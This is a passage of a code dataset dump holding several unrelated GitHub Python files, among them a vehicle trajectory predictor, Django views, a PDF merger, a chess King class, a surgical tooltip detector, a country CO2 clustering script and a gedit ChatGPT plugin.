获得交https://pics1.baidu.com/feed/3ac79f3df8dcd100d90a9c6985f05f1db8122f68.jpeg@f_auto?token=75e0258603c7fd0fb8e581290c192e69通车信息\n \n if f'{ego_id}-{cur_frame_id}' not in traffic_dict:\n print(f'there is no {ego_id}-{cur_frame_id}.')\n break\n \n traffic_info = traffic_dict[f'{ego_id}-{cur_frame_id}']\n \n # 获得主车未来轨迹\n ego_future_path = get_future_path(ego_id, ego_path_dict, cur_S)\n # print(len(ego_future_path))\n \n # 获得主车预测加速度\n # ego_info = (cur_ego_x, cur_ego_y, cur_vx, cur_vy, cur_yaw)\n # acc = inference(model, ego_info=ego_info, traffic_info=traffic_info, ego_future_path=ego_future_path)\n ego_info = (cur_ego_x, cur_ego_y, cur_vx, cur_vy, cur_yaw)\n \n acc = inference(model, ego_info=ego_info, traffic_info=traffic_info, ego_future_path=ego_future_path, ego_history_path=cur_ego_history_path)\n \n # 根据预测得到下一步路径\n next_S, next_ve = get_s_ve(cur_S, cur_ve, acc)\n\n try:\n # 根据下一步路径得到下一步路径的状态\n next_ego_x, next_ego_y, next_vx, next_vy, next_yaw = get_state(ego_id, next_S, old_x=cur_ego_x, old_y=cur_ego_y, ego_path_dict=ego_path_dict)\n except Exception as e:\n break\n \n # next_ve = get_ve(next_vx, next_vy, next_yaw)\n next_ego_history_path = update_ego_history(next_ego_x, next_ego_y, next_yaw, cur_ego_history_path)\n \n cur_frame_id += 1\n cur_S = next_S\n cur_ve = next_ve\n cur_ego_x, cur_ego_y = next_ego_x, next_ego_y\n cur_vx, cur_vy = next_vx, next_vy\n cur_yaw = next_yaw\n cur_ego_history_path = next_ego_history_path\n \n new_motion_state = MotionState(time_stamp_ms=cur_frame_id*1000)\n new_motion_state.x = cur_ego_x\n new_motion_state.y = cur_ego_y\n new_motion_state.vx = cur_vx\n new_motion_state.vy = cur_vx\n new_motion_state.psi_rad = cur_yaw\n prediction_track_dict[cur_frame_id*100] = new_motion_state\n \n return prediction_track_dict\n \n \ndef get_state(ego_id, S, old_x, old_y, ego_path_dict):\n Ts = 0.1\n ego_path = ego_path_dict[str(ego_id)]\n \n x = [point[1] for point in ego_path]\n y = [point[2] for point in ego_path]\n yaw = [point[3] for point in ego_path]\n distances = [point[-1] for point in ego_path]\n\n # 创建插值函数\n f_x = interp1d(distances, x, kind='linear')\n f_y = interp1d(distances, y, kind='linear')\n f_yaw = interp1d(distances, yaw, kind='linear')\n\n # 定义新的路程值(等路程间隔)\n new_distances = S\n\n # 使用插值函数计算对应的 x、y 值和航向角\n new_x = f_x(new_distances)\n new_y = f_y(new_distances)\n new_yaw = f_yaw(new_distances)\n new_vx = (new_x - old_x) / Ts\n new_vy = (new_y - old_y) / Ts\n return new_x, new_y, new_vx, new_vy, new_yaw\n\n\ndef get_s_ve(S0, Ve, acc):\n # S0是车辆当前的路程,Ve是车辆当前的速度,acc是车辆当前的加速度\n Ts = 0.1 # 时间步长\n S = S0 + Ve * Ts + 1/2 * acc * Ts * Ts\n new_Ve = Ve + acc * Ts\n \n return S, new_Ve\n\n \n# def get_ve(vx, vy, ego_yaw):\n# return vx * np.cos(ego_yaw) + vy * np.sin(ego_yaw)\n \n \ndef get_inital_state(ego_id, frame_id, ego_path_dict):\n # 根据主车id和frame_id获得初始状态\n ego_path = ego_path_dict[str(ego_id)] \n \n for i, frame in enumerate(ego_path):\n if frame[0] == frame_id:\n ego_x, ego_y, ego_yaw, ego_vx, ego_vy, S = frame[1:]\n break\n \n return ego_x, ego_y, ego_yaw, ego_vx, ego_vy, S\n\n\ndef get_future_path(ego_id, ego_path_dict, S):\n ego_path = ego_path_dict[str(ego_id)]\n\n x = [point[1] for point in ego_path]\n y = [point[2] for point in ego_path]\n yaw = [point[3] for point in ego_path]\n distances = [point[-1] for point in ego_path]\n\n # 创建插值函数\n f_x = interp1d(distances, x, kind='linear')\n f_y = interp1d(distances, y, kind='linear')\n f_yaw = interp1d(distances, yaw, kind='linear')\n\n # 定义新的路程值(等路程间隔)\n new_distances = np.arange(S, distances[-1], 0.5) # 此处步长为1.0,可以根据需要调整\n\n # 使用插值函数计算对应的 x、y 值和���向角\n new_x = f_x(new_distances)\n new_y = f_y(new_distances)\n new_headings = f_yaw(new_distances)\n new_ego_future_path = list(zip(new_x, new_y, new_headings))\n\n return new_ego_future_path\n\n\ndef initial_ego_history(x, y, yaw):\n oldest_point = (x, y, yaw)\n ego_history_path = [oldest_point] * 10\n return ego_history_path\n\n\ndef update_ego_history(x, y, yaw, ego_history_path):\n ego_history_path.pop(0)\n ego_history_path.append((x, y, yaw))\n return ego_history_path\n","repo_name":"Heath-zyl/interaction_dataset_titl","sub_path":"python/main_calulate_prediction.py","file_name":"main_calulate_prediction.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"44118158109","text":"from django.db.models import Avg\nfrom django.http import Http404\nfrom django.shortcuts import render\n\nfrom book_outlet.models import Book\n\n\ndef index(request):\n books = Book.objects.all().order_by(\"title\")\n total_book_count = books.count()\n average_rating = books.aggregate(Avg(\"rating\"))\n return render(request, \"book_outlet/index.html\",\n {\n 'books': books,\n 'total_book_count': total_book_count,\n 'average_rating': average_rating\n })\n\n\ndef book_detail(request, slug):\n try:\n book = Book.objects.get(slug=slug)\n except:\n raise Http404()\n\n return render(request, \"book_outlet/book_detail.html\",\n {\n 'title': book.title,\n 'author': book.author,\n 'rating': book.rating,\n 'is_bestseller': book.is_bestselling\n })\n","repo_name":"umargarga/django-book-store","sub_path":"book_outlet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23700676133","text":"# Merge every PDF document on this folder\n\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\nfrom os import listdir\nimport os\nfrom os import path\n\ninput_dir = f\"{path.join(path.dirname (path.abspath(__file__)), 'backup-pdf')}\"\nprint(input_dir)\nmerge_list = []\n\nfor x in listdir(input_dir):\n if not x.endswith('.pdf'):\n continue\n merge_list.append(PdfFileReader(open(path.join(input_dir, x), 'rb')))\n\nmerger = PdfFileMerger()\n\nfor pdf in merge_list:\n merger.append(pdf)\n\nmerger.write(path.join(input_dir, 'merded_pdf.pdf')) #your output directory\nmerger.close()","repo_name":"NKKFu/autoce-v2","sub_path":"mergepdf.py","file_name":"mergepdf.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"34162858071","text":"# 재귀적 함수 호출\n\ndef factorial(x):\n if x == 1:\n return 1\n return x * factorial(x-1)\n\nprint(factorial(3)) # 6\nprint(factorial(4)) # 24\n\n\ndef hanoi(ndisks, startPeg=1, endPeg=3):\n if ndisks:\n hanoi(ndisks-1, startPeg, 6-startPeg-endPeg)\n print(startPeg, \"번 기둥의\", ndisks, \"번 원반을\", endPeg, \"번 기둥에 옮깁니다.\")\n hanoi(ndisks-1, 6-startPeg-endPeg, endPeg)\n\nhanoi(ndisks=6)","repo_name":"kshelp/python","sub_path":"ch04_function/ex05_recursive.py","file_name":"ex05_recursive.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25677912127","text":"from piece.base import SingleMovePiece\nfrom piece.rook import Rook\nfrom board.location import Location\nfrom util.enums import Side\nfrom board.move import Move\n\n\nclass King(SingleMovePiece):\n MOVE_VECTORS = [\n (-1, -1),\n (-1, 1),\n (1, -1),\n (1, 1),\n (-1, 0),\n (1, 0),\n (0, -1),\n (0, 1),\n ]\n\n def checked(self, location=None):\n \"\"\" Check if the king is in check\n\n :param location: Location or none (defaults to current location)\n :return: boolean\n \"\"\"\n location = self.location if location is None else location\n return location in self.board.attacked_locations(self.player.opponent())\n\n def can_castle(self, side):\n \"\"\" Determine if a king can castle to a certain side\n\n :param side: Side enum\n :return: boolean\n \"\"\"\n # king can't have moved\n if not self.moved:\n rook = self._get_unmoved_rook(side)\n if rook is not None:\n # check that no pieces are between the rook and king\n for loc in Location.from_between(rook.location, self.location):\n if not self.board.empty(loc):\n return False\n return True\n return False\n\n def _get_unmoved_rook(self, side):\n \"\"\" Try to get an unmoved rook based on the starting location\n\n :param side: Side enum\n :return: Rook or none if moved / captured\n \"\"\"\n if side == Side.KING:\n rook = self.board.piece(Location(self.location.row, Location.COLS[-1]), self.player)\n else:\n rook = self.board.piece(Location(self.location.row, Location.COLS[0]), self.player)\n if rook and isinstance(rook, Rook) and not rook.moved:\n return rook\n return None\n\n def moves(self):\n \"\"\" Get all possible moves by this piece (unvalidated moves)\n\n :return: Move generator\n \"\"\"\n yield from super().moves()\n\n if self.can_castle(Side.KING):\n rook = self._get_unmoved_rook(Side.KING)\n yield Move.create_castle(self, self.location.offset(0, 2), rook, rook.location.offset(0, -2))\n if self.can_castle(Side.QUEEN):\n rook = self._get_unmoved_rook(Side.QUEEN)\n yield Move.create_castle(self, self.location.offset(0, -2), rook, rook.location.offset(0, 3))","repo_name":"zackee12/command-line-chess","sub_path":"piece/king.py","file_name":"king.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"26280485496","text":"\"\"\"\n@brief Detector of surgical tooltips in endoscopic images.\n@author Luis C. Garcia Peraza Herrera (luiscarlos.gph@gmail.com).\n@date 16 Jan 2021.\n\"\"\"\n\nimport skimage.morphology\nimport sknw\nimport numpy as np\nimport cv2\nimport sklearn.metrics\n\n# My imports\nimport endoseg\nimport endotip.graph\n\nclass Detector():\n \"\"\"\n @class Detector aims to localize the tooltips of the instruments present \n in endoscopic images.\n \"\"\"\n\n def __init__(self, max_inst=2, max_tips=2):\n \"\"\"\n @param[in] max_inst Maximum number of instruments in the image.\n @param[in] max_tips Maximum number of tips per instrument.\n \"\"\"\n self.max_inst = max_inst\n self.max_tips = max_tips\n self._graph = None\n self._im = None\n \n @staticmethod\n def skel(tool_seg):\n \"\"\"\n @brief Convert the tool segmentation into a pixel-wide skeleton.\n @returns a single-channel image with the pixels of the skeleton\n labelled as 255 and the background as zero.\n \"\"\"\n return skimage.morphology.skeletonize_3d(tool_seg.astype(bool))\n \n @staticmethod\n def skel2graph(skel):\n \"\"\"\n @brief Convert the pixel-wide skeleton into a networkx graph.\n @returns a ToolGraph representing the skeleton\n provided as input.\n \"\"\"\n return endotip.graph.ToolGraph().from_sknw(sknw.build_sknw(skel))\n\n @staticmethod\n def find_entry_pixels(ep_region_instance_seg, endo_seg, \n border_thickness=1):\n \"\"\"\n @brief This method receives the connected component segmentation of\n the entrypoints, which usually looks like a curved rectangle.\n The objective is then to reduce the curved rectangle into a\n single pixel that can be used as a tool entrypoint.\n @param[in] ep_region_instance_seg Instance segmentation of the \n border entrypoints.\n @param[in] endo_seg Segmentation of the visible\n endoscopic area.\n @returns a dictionary with all the entrypoint pixels found. The keys \n are integers and the values are [x, y] pairs.\n \"\"\" \n # Get a mask of the pixel-wide border\n #contours, hierarchy = cv2.findContours(endo_seg, cv2.RETR_TREE, \n # cv2.CHAIN_APPROX_SIMPLE)\n #border_seg = np.zeros_like(endo_seg)\n #cv2.drawContours(border_seg, contours, -1, 255, border_thickness)\n \n # Get the instance segmentation of the pixel-wide border \n #ep_region_instance_seg = ep_region_instance_seg.astype(np.uint8)\n #border_inst_seg = cv2.bitwise_and(border_seg, ep_region_instance_seg)\n \n # Get the 1-pixel entrypoint instance segmentation\n entry_pixels = {}\n num_ep = np.max(ep_region_instance_seg)\n for i in range(1, num_ep + 1):\n # Bruteforce geometric median\n #points = np.vstack(np.where(border_inst_seg == i)).T\n points = np.vstack(np.where(ep_region_instance_seg == i)).T\n dist = sklearn.metrics.pairwise_distances(points, points)\n geomedian = points[np.argmin(dist.sum(axis=1))] # [y, x]\n entry_pixels[i] = geomedian[::-1] # [x, y] \n\n return entry_pixels\n\n def extract_entry_nodes(self, endo_seg, tool_seg, graph, margin=32):\n \"\"\"\n @brief Detects the entrypoints and fuses them into a single\n entrypoint per instrument. All the entry nodes are marked with\n the attribute 'entry=True'. The rest of the nodes are marked\n with 'entry=False'.\n @param[in] endo_seg Endoscopic area segmentation. \n @param[in] tool_seg Binary (0, 255) tool segmentation.\n @param[in, out] graph ToolGraph representing \n the skeleton of the tools.\n \"\"\"\n\n # Get the segmentation of the endoscopic border\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,\n (margin, margin))\n smaller_endo_seg = cv2.erode(endo_seg, kernel, iterations=1) \n border_seg = endo_seg - smaller_endo_seg\n \n # Get the segmentation of the entrypoints\n entry_mask = cv2.bitwise_and(tool_seg, border_seg)\n\n # Find connected components in the entrypoint segmentation\n ret, ep_region_instance_seg = cv2.connectedComponents(entry_mask)\n\n # Find entrypoint pixels based on the entrypoint segmentation\n entry_pixels = Detector.find_entry_pixels(ep_region_instance_seg, \n endo_seg)\n\n # Group nodes in sets, those inside the same entry CC go together \n entry_nodes = [set() for i in range(len(entry_pixels) + 1)]\n for v in graph.nodes():\n x, y = graph.coord(v)\n entry_nodes[ep_region_instance_seg[y, x]].add(v)\n\n # Collapse the entry nodes within the same entry region\n for p in entry_pixels:\n # Create new entry node\n new_node = graph.add_coord_node(entry_pixels[p][0],\n entry_pixels[p][1], entry=True)\n\n # Collapse all the nodes within the entry region into the entry \n # node\n graph.contract_nodes(new_node, entry_nodes[p])\n\n # TODO: Special case: all the nodes of the graph are within the \n # entry connected component, needs to be trated differently\n\n def detect(self, im, raw_tool_seg):\n \"\"\"\n @brief Localise the tooltips of the surgical instruments in the image.\n @param[in] im BGR image as a numpy.ndarray.\n @param[in] raw_tool_seg 2D binary mask containing a semantic \n tool-background segmentation. \n @returns a JSON containing the location of the tooltips in the image.\n \"\"\"\n # Segment the visible area of the endoscopic image\n endo_segmenter = endoseg.Segmenter()\n endo_seg = endo_segmenter.segment(im, erode_iterations=1)\n \n # We force the tool segmentation to be inside the visible area\n tool_seg = cv2.bitwise_and(raw_tool_seg, endo_seg)\n\n # Get a skeleton of the tools\n skel = Detector.skel(tool_seg)\n\n # Convert tool skeleton into a graph\n graph = Detector.skel2graph(skel)\n \n # Instrument entry node extraction\n self.extract_entry_nodes(endo_seg, tool_seg, graph)\n\n # Remove nodes that are not connected to the extracted entry nodes\n # and entry nodes that are not connected to anyone\n graph.prune_disconnected_nodes()\n\n # Dot product traversal edge labelling\n graph.dot_product_traversal()\n\n # Separate different tools into different graph components\n graph.disentangle_tools()\n\n # Only the furthest tips are kept\n graph.keep_furthest_tips(self.max_tips)\n\n # Only the instruments with the furthest tips are kept\n graph.keep_longest_inst(self.max_inst)\n\n # Store image and tool graph\n self._graph = graph\n self._im = im\n\n def get_tips(self, padding=False):\n \"\"\"\n @param[in] padding If True, the list of tips is padded with Nones until we\n reach 'max_inst' * 'max_tips'.\n @returns a dictionary with a list of leaf nodes in the following format:\n {'tips': [{'x': 1, 'y': 2}, {'x': 3, 'y': 4}]}. \n The tips are not in any particular order.\n \"\"\"\n tips = {'tips': [{'x': int(v[0]), 'y': int(v[1])}\n for v in self._graph.leaf_nodes(coord=True)]}\n \n # Fill the rest with None if the user wants\n if padding:\n remaining = (self.max_inst * self.max_tips) - len(tips['tips'])\n for _ in range(remaining):\n tips['tips'].append(None)\n \n return tips\n\n def get_entry_nodes(self, padding=False):\n \"\"\"\n @param[in] padding If True, the list of entry nodes will be filled with None\n values until we reach 'max_inst'.\n @returns a dictionary with a list of entrynodes in the following format: \n {'entrynodes': [{'x': 1, 'y': 2}, {'x': 3, 'y': 4}]}\n \"\"\"\n entrynodes = {'entrynodes': [{'x': int(v[0]), 'y': int(v[1])} \n for v in self._graph.entry_nodes(coord=True)]}\n \n # Fill the rest with None values if the user wants\n if padding:\n remaining = self.max_inst - len(entrynodes['entrynodes'])\n for _ in range(remaining):\n entrynodes['entrynodes'].append(None)\n\n return entrynodes\n \n def get_left_instrument_tips(self, padding=False):\n assert(self.max_inst == 2)\n left_tips = []\n \n # Get entry nodes and their coordinates in the image \n ep = {v: self._graph.coord(v) for v in self._graph.entry_nodes()}\n\n # If there are entry nodes, let's find if there is a left instrument\n left_entry_node = None\n if ep:\n keys = list(ep.keys())\n f_x = ep[keys[0]][0]\n\n # If there is only one instrument \n if len(ep) == 1:\n if f_x < self._im.shape[1] // 2:\n left_entry_node = keys[0] \n else:\n s_x = ep[keys[1]][0]\n if s_x > f_x:\n left_entry_node = keys[0]\n else:\n left_entry_node = keys[1]\n\n # Find the tips associated with the left instrument entry node\n leaf_nodes = self._graph.matched_leaf_nodes(left_entry_node)\n for v in leaf_nodes:\n coord = self._graph.coord(v)\n left_tips.append({'x': coord[0], 'y': coord[1]})\n\n if padding:\n remaining = self.max_tips - len(left_tips) \n for _ in range(remaining):\n left_tips.append({'x': None, 'y': None})\n \n return left_tips\n\n def get_right_instrument_tips(self, padding=False):\n assert(self.max_inst == 2)\n right_tips = []\n \n # Get entry nodes and their coordinates in the image \n ep = {v: self._graph.coord(v) for v in self._graph.entry_nodes()}\n\n # If there are entry nodes, let's find if there is a right instrument\n right_entry_node = None\n if ep:\n keys = list(ep.keys())\n f_x = ep[keys[0]][0]\n\n # If there is only one instrument \n if len(ep) == 1:\n if f_x >= self._im.shape[1] // 2:\n right_entry_node = keys[0] \n else:\n s_x = ep[keys[1]][0]\n if s_x <= f_x:\n right_entry_node = keys[0]\n else:\n right_entry_node = keys[1]\n\n # Find the tips associated with the right instrument entry node\n leaf_nodes = self._graph.matched_leaf_nodes(right_entry_node)\n for v in leaf_nodes:\n coord = self._graph.coord(v)\n right_tips.append({'x': coord[0], 'y': coord[1]})\n\n if padding:\n remaining = self.max_tips - len(right_tips) \n for _ in range(remaining):\n right_tips.append({'x': None, 'y': None})\n \n return right_tips\n\n '''\n def plot(self, **kwargs):\n \"\"\"@returns the tool graph plotted on top of the input image.\"\"\"\n if self._graph is None:\n raise RuntimeError(\"\"\"[ERROR] You want to plot the results of the\n tool detector but you have not called the detect() method.\"\"\")\n #return self.graph.draw_onto_image(self.im, **kwargs)\n return self._graph.draw_onto_canvas()\n '''\n","repo_name":"luiscarlosgph/endotip","sub_path":"src/endotip.py","file_name":"endotip.py","file_ext":"py","file_size_in_byte":11788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19148867865","text":"#Zadatak 1 (a)\na = 5.0\nb = 4.935\nprint(a-b)\n#Očekujemo rezultat 0.065, ali dobili smo 0.06500000000000039. \n#To se događa jer razliku brojeva a i b ne možemo zapisati u obliku potencije 1/2^n.\n#S obzirom na to, rezultat dobiven u Pythonu točan je do određene decimale nakon koje dolazi do odstupanja, tj. ovakav rezultat je aproksimacija. \n\n#Zadatak 1 (b)\na = 0.1\nb = 0.2\nc = 0.3\nd = 0.6\nif a+b+c == d:\n print(\"Jednako\")\nelse:\n print(\"Nije jednako\")\n\nprint(a+b+c)\n\n#Očekivali smo rezultat 0.6, ali dobili smo 0.6000000000000001.\n#Do odstupanja dolazi zbog istog razloga kao u zadatku pod a.\n\n","repo_name":"IrisButigan/PAF","sub_path":"Vjezbe/Vjezbe_3/zadatak1.py","file_name":"zadatak1.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17718922974","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\n'''\r\nObjectif de ce code : \r\nConstruire des groupes de pays présentant les mêmes caractéristiques (sur 2014)\r\nNous avons pris le parti ici de se focaliser sur des caractéristiques environnementale\r\n\r\n- Construction de la segmentation avec la méthode K-means \r\n- Interprétation des clusters identifiés\r\n'''\r\n\r\n################################\r\n# I - IMPORT DES DONNEES \r\n################################\r\n\r\ndata = pd.read_csv('C:\\\\etude_cas_mcougul\\\\data\\\\WDIData.csv', sep=',')\r\ncountry = pd.read_csv('C:\\\\etude_cas_mcougul\\\\data\\\\WDICountry.csv', sep=',')\r\nseries_1= pd.read_csv('C:\\\\etude_cas_mcougul\\\\data\\\\WDISeries.csv', sep=',')\r\n\r\n\r\n###################################\r\n# II - PREPARATION DES DONNEES \r\n###################################\r\n\r\n# On filtre les data sur les pays \r\n\r\ndata_pays=data[['Country Code','Country Name','Indicator Code','2014']]\r\n\r\nliste = ['ARB','CSS','CEB','EAR','EAS','EAP','TEA','EMU','ECS','ECA','TEC','EUU','FCS','HPC',\r\n'HIC','IBD','IBT','IDB','IDX','IDA','LTE','LCN','LDC','LAC','TLA',' UN classification','LMY','LIC',\r\n'LMC','MEA','MNA','TMN','MIC','NAC','INX','OED','OSS','PSS','PST','PRE','SST','SAS','TSA','SSF',\r\n'SSA','TSS','UMC','WLD']\r\n\r\nfor i in liste:\r\n data_pays=data_pays[data_pays['Country Code'] != i]\r\n \r\n\r\n# On garde uniquement les indicateurs qui nous intéresse pour la clusterisation\r\n# cf. les indicateurs identifiés précédemment\r\n\r\nlist_kpis = ['EN.ATM.CO2E.GF.ZS',\r\n'EN.CO2.ETOT.ZS',\r\n'EN.ATM.CO2E.SF.ZS',\r\n'EN.CO2.TRAN.ZS',\r\n'EG.USE.COMM.CL.ZS',\r\n'EN.CO2.BLDG.ZS',\r\n'EN.CO2.OTHX.ZS',\r\n'EN.ATM.CO2E.LF.ZS',\r\n'EG.USE.CRNW.ZS']\r\n\r\ndata_pays_clustering=data_pays[data_pays[\"Indicator Code\"]=='EN.ATM.CO2E.PC']\r\ndata_pays_clustering.drop(['Indicator Code'],axis=1,inplace=True)\r\ndata_pays_clustering.rename(columns={'2014':'EN.ATM.CO2E.PC'},inplace = True)\r\n\r\nfor i in list_kpis:\r\n ajout_kpi=data_pays[data_pays[\"Indicator Code\"]==i]\r\n ajout_kpi.drop(['Country Name'], axis=1, inplace = True)\r\n data_pays_clustering = pd.merge(data_pays_clustering,ajout_kpi,on=['Country Code'],how='inner')\r\n data_pays_clustering.drop(['Indicator Code'],axis=1,inplace=True)\r\n data_pays_clustering.rename(columns={'2014':i} ,inplace = True) \r\n\r\n\r\n# Suppression des valeurs manquantes\r\n\r\ndata_pays_clustering=data_pays_clustering.dropna(axis=0)\r\n\r\n# Table finale\r\n\r\nx = data_pays_clustering.drop([\"Country Name\",\"Country Code\"],axis=1)\r\n\r\n\r\n###################################\r\n# III - CLUSTERISATION\r\n###################################\r\n\r\n# 1 - On utilise la méthode elbow pour trouver le nombre optimal de clusters\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import cluster\r\nwcss = []\r\nfor i in range(1, 11):\r\n kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 0)\r\n kmeans.fit(x)\r\n wcss.append(kmeans.inertia_) #attribut inertia_ qui est en fait le calcul de wcss\r\nplt.plot(range(1, 11), wcss) #plot(abscisse, ordonnée) => range(1,11) pour avoir chaque nb entre 1 et 10\r\nplt.title('La méthode Elbow')\r\nplt.xlabel('Nombre de clusters')\r\nplt.ylabel('WCSS')\r\nplt.show()\r\n\r\n# 2 - K-means \r\nkmeans = cluster.KMeans(n_clusters=4,init = 'k-means++',random_state=0)\r\nkmeans.fit(x)\r\ny_kmeans = kmeans.predict(x)\r\n\r\n# index triés des groupes\r\nidk = np.argsort(kmeans.labels_)\r\n# affichage des observations et leurs groupes\r\nclasse=pd.DataFrame(kmeans.labels_[idk],x.index[idk])\r\n\r\n# 3 - Fusion avec les données\r\n\r\nclustering=pd.merge(data_pays_clustering,classe,left_index=True,right_index=True)\r\nclustering.rename(columns={'EN.ATM.CO2E.GF.ZS' : 'CO2 emissions from gaseous fuel',\r\n'EN.CO2.ETOT.ZS' : 'CO2 emissions from elec and heat prod',\r\n'EN.ATM.CO2E.SF.ZS' : 'CO2 emissions from solid fuel',\r\n'EN.CO2.TRAN.ZS' : 'CO2 emissions from transport',\r\n'EG.USE.COMM.CL.ZS' : 'Alternative and nuclear energy',\r\n'EN.CO2.BLDG.ZS' : 'CO2 emissions from buildings',\r\n'EN.CO2.OTHX.ZS' : 'CO2 emissions from other sectors',\r\n'EN.ATM.CO2E.LF.ZS' : 'CO2 emissions from liquid fuel',\r\n'EG.USE.CRNW.ZS' : 'Combustible renewables and waste',\r\n'EN.ATM.CO2E.PC' : 'emission co2 capita'},inplace=True)\r\n\r\n###################################\r\n# IV - INTERPRETATION\r\n###################################\r\n\r\n# On crée des indices de sur ou sous représentation basés sur la moyenne tous pays confondus\r\n# (base 100 => si l'indice est égal à 100 pour une classe, cela veut dire que la moyenne de \r\n# la classe = moyenne tous pays confondus)\r\n\r\ngb=clustering.groupby(kmeans.labels_)\r\ninterpret_groups = gb.mean() / clustering.mean() * 100\r\ninterpret_groups.rename(columns={'EN.ATM.CO2E.GF.ZS' : 'CO2 emissions from gaseous fuel',\r\n'EN.CO2.ETOT.ZS' : 'CO2 emissions from elec and heat prod',\r\n'EN.ATM.CO2E.SF.ZS' : 'CO2 emissions from solid fuel',\r\n'EN.CO2.TRAN.ZS' : 'CO2 emissions from transport',\r\n'EG.USE.COMM.CL.ZS' : 'Alternative and nuclear energy',\r\n'EN.CO2.BLDG.ZS' : 'CO2 emissions from buildings',\r\n'EN.CO2.OTHX.ZS' : 'CO2 emissions from other sectors',\r\n'EN.ATM.CO2E.LF.ZS' : 'CO2 emissions from liquid fuel',\r\n'EG.USE.CRNW.ZS' : 'Combustible renewables and waste',\r\n'EN.ATM.CO2E.PC' : 'emission co2 capita'},inplace=True)\r\n\r\n# Nombre de pays par cluster\r\n\r\nclustering[\"Country Name\"].groupby(kmeans.labels_).count()\r\n\r\n###################################\r\n# V - VISUALISATION\r\n###################################\r\n\r\nclustering[\"classe\"]=clustering.iloc[:, -1].values\r\n\r\ncolors = {0:'blue', 1:'red', 2:'green', 3:'black'}\r\n\r\nclustering.plot.scatter(x='CO2 emissions from solid fuel', y='CO2 emissions from gaseous fuel', c=clustering[\"classe\"].apply(lambda x: colors[x]))\r\nclustering.plot.scatter(x='CO2 emissions from gaseous fuel', y='Combustible renewables and waste', c=clustering[\"classe\"].apply(lambda x: colors[x]))\r\n\r\n","repo_name":"mariecoo/Etude-de-cas-iAdvize","sub_path":"04 - clustering.py","file_name":"04 - clustering.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74491415442","text":"from django.shortcuts import render\n\nfrom django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\n\n\ndef image_upload(request):\n if request.method == \"POST\" and request.FILES[\"image_file\"]:\n image_file = request.FILES[\"image_file\"]\n fs = FileSystemStorage()\n filename = fs.save(image_file.name, image_file)\n image_url = fs.url(filename)\n print(image_url)\n return render(request, \"upload.html\", {\n \"image_url\": image_url\n })\n\n spisok = []\n for i in range(1,500):\n spisok.append('n ('+str(i)+').jpg')\n return render(request, \"upload.html\",{'spisok':spisok})\n","repo_name":"ekam230/django-docker-config-dev-prod","sub_path":"app/upload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19396694802","text":"# For more info visit the article https://theawless.github.io/How-to-write-plugins-for-gedit/\n\n# This file needs to be placed like ~/.local/share/gedit/plugins/example/__init__.py\n# or renamed like ~/.local/share/gedit/plugins/example.py depending on .plugin file\n\nfrom gi.repository import GObject, Gtk, Gdk, GLib, Gedit, PeasGtk, Gio\nimport os\nimport pathlib \nfrom .conffile import load_conf_dict\nfrom .libchatgpt import chatgpt_query\n\ntextview_textbuffer = None;\n\ndef working_over_text(mytext,dict_conf,action_name,api_key):\n myquery='';\n for cmd in dict_conf['commands']:\n if cmd['name']==action_name:\n myquery=cmd['query'];\n result=chatgpt_query(myquery+mytext,api_key);\n return result;\n\n# For our example application, this class is not exactly required.\n# But we had to make it because we needed the app menu extension to show the menu.\nclass GoToChatGPTAppActivatable(GObject.Object, Gedit.AppActivatable):\n app = GObject.property(type=Gedit.App)\n __gtype_name__ = \"GoToChatGPTAppActivatable\"\n\n def __init__(self):\n GObject.Object.__init__(self)\n self.menu_ext = None;\n self.menu_item = None;\n\n # path of conf file\n self.conf_path=os.path.join(pathlib.Path.home(),'GoToChatGPT.json');\n self.dict_conf = load_conf_dict(self.conf_path);\n \n def do_activate(self):\n self._build_menu()\n\n def _build_menu(self):\n # Get the extension from tools menu \n self.menu_ext = self.extend_menu(\"tools-section\")\n # This is the submenu which is added to a menu item and then inserted in tools menu. \n sub_menu = Gio.Menu();\n\n for dat in self.dict_conf['commands']:\n # (label,name)\n sub_menu_item = Gio.MenuItem.new(dat['summary']+'\\t'+dat['accelerator'],'win.'+dat['name']);\n sub_menu.append_item(sub_menu_item);\n \n self.menu_item = Gio.MenuItem.new_submenu(\"Go To ChatGPT\", sub_menu)\n self.menu_ext.append_menu_item(self.menu_item)\n\n for dat in self.dict_conf['commands']:\n # Setting accelerators, now our action is called when Ctrl+Alt+1 is pressed.\n self.app.set_accels_for_action('win.'+dat['name'], [dat['accelerator']]);\n\n def do_deactivate(self):\n self._remove_menu()\n\n def _remove_menu(self):\n # removing accelerator and destroying menu items\n self.app.set_accels_for_action(\"win.dictonator_start\", ())\n self.menu_ext = None\n self.menu_item = None\n\n\nclass GoToChatGPTWindowActivatable(GObject.Object, Gedit.WindowActivatable, PeasGtk.Configurable):\n window = GObject.property(type=Gedit.Window)\n __gtype_name__ = \"GoToChatGPTWindowActivatable\"\n\n def __init__(self):\n GObject.Object.__init__(self)\n # This is the attachment we will make to 